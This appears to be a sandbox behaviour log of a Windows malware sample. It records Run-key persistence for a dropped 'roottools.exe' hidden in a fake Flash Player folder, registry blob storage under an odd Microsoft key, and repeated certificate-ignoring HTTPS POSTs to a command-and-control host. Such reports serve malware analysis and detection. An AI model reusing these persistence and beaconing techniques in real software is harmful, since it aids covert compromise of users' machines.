| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
|
For performance reasons, the remaining 1657 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run, value_name = roottools.exe, data = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", size = 226, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, type = size, size_out = 196608 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 196608, size_out = 196608 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
14 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:59:09 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close a ü@, url = aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close a ü@, url = aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 192 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:59:10 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close t ¤A, url = aaopsjdf.top/v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close t ¤A, url = aaopsjdf.top/v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 192 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:59:09 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close _ æ@, url = aaopsjdf.top/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close _ æ@, url = aaopsjdf.top/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 192 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:59:10 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close d°é@, url = aaopsjdf.top/dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close d°é@, url = aaopsjdf.top/dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 192 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:59:10 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close еA, url = aaopsjdf.top/dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/ |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close еA, url = aaopsjdf.top/dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/ |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 192 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
